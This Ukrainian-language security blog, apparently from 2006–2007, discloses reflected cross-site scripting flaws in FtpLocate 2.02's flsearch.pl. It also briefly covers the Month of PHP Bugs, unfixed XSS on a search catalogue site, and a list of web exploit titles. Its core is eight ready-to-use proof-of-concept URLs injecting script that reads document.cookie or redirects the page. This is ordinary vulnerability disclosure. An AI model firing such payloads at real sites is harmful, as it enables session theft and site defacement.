Websecurity - Веб безпека

Ще в жовтні минулого року (12.10.2006) я знайшов Cross-Site Scripting уразливості в FtpLocate - це движок пошуку по ftp серверам. Дані уразливості зокрема я знайшов на сайті locate.in.ua (про що я писав), адмінам якого я повідомив.

Уразливим до XSS є версія FtpLocate 2.02 (і можливо попередні).

XSS:

Уразливості в скрипті flsearch.pl в параметрах all, query, nounix, sizemin, sizemax, sizeunit та sizebytes.

http://site/cgi-bin/ftplocate/flsearch.pl?all=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&query=test
http://site/cgi-bin/ftplocate/flsearch.pl?query=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/cgi-bin/ftplocate/flsearch.pl?query=test&nounix=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/cgi-bin/ftplocate/flsearch.pl?query=test&sizemin=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/cgi-bin/ftplocate/flsearch.pl?query=test&sizemax=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/cgi-bin/ftplocate/flsearch.pl?query=test&sizeunit=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/cgi-bin/ftplocate/flsearch.pl?query=test&sizebytes=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/cgi-bin/ftplocate/flsearch.pl?query=test&sizebytes=%22%3E%3Cscript%3Edocument.location%3D'http://websecurity.com.ua'%3C/script%3E

Пішла жара… розпочався Month of PHP Bugs , як повідомив сьогодні Стефан Ессер. Про даний проект я згадував учора - Місяць багів в PHP, котрим був обраний березень - це новий проект, мета якого публікація інформації про діри в безпеці PHP.

Як повідомляється на офіційному сайті проекту в перший день, як раз при відкритті цього проекту, було повідомлено про три уразливості в PHP.

• PHP 4 Userland ZVAL Reference Counter Overflow Vulnerability (деталі), експлоіт: MOPB-01-2007.php
• PHP Executor Deep Recursion Stack Overflow (деталі)
• PHP Variable Destructor Deep Recursion Stack Overflow (деталі)

Тому перший день Місяця багів в PHP видався жарким , подивимося що приготував нам Стефан на завтра.

13.12.2006

У жовтні, 01.10.2006, я знайшов декілька Cross-Site Scripting уразливостей на популярному проекті http://www.mavicanet.com (Багатомовний Пошуковий Каталог). Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

01.03.2007

XSS:

• alert(document.cookie)
• html включення
• html ін’єкція
• alert(document.cookie)
• html включення
• alert(document.cookie)
• цікавий
• html включення

Дані уразливісті досі не виправлені.

В даній добірці експлоіти в веб додатках:

• Munch Pro 1.0 (switch.asp) Remote SQL Injection Exploit (деталі)
• Rama CMS <= 0.68 (Cookie: lang) Local File Include Exploit (деталі)
• PHPWind <= 5.0.1 (AdminUser) Remote Blind SQL Injection Exploit (деталі)
• phpwcms <= 1.2.6 (Cookie: wcs_user_lang) Local File Include Exploit (деталі)
• DoS Exploit for UniversalFTP version 1.0.50 (деталі)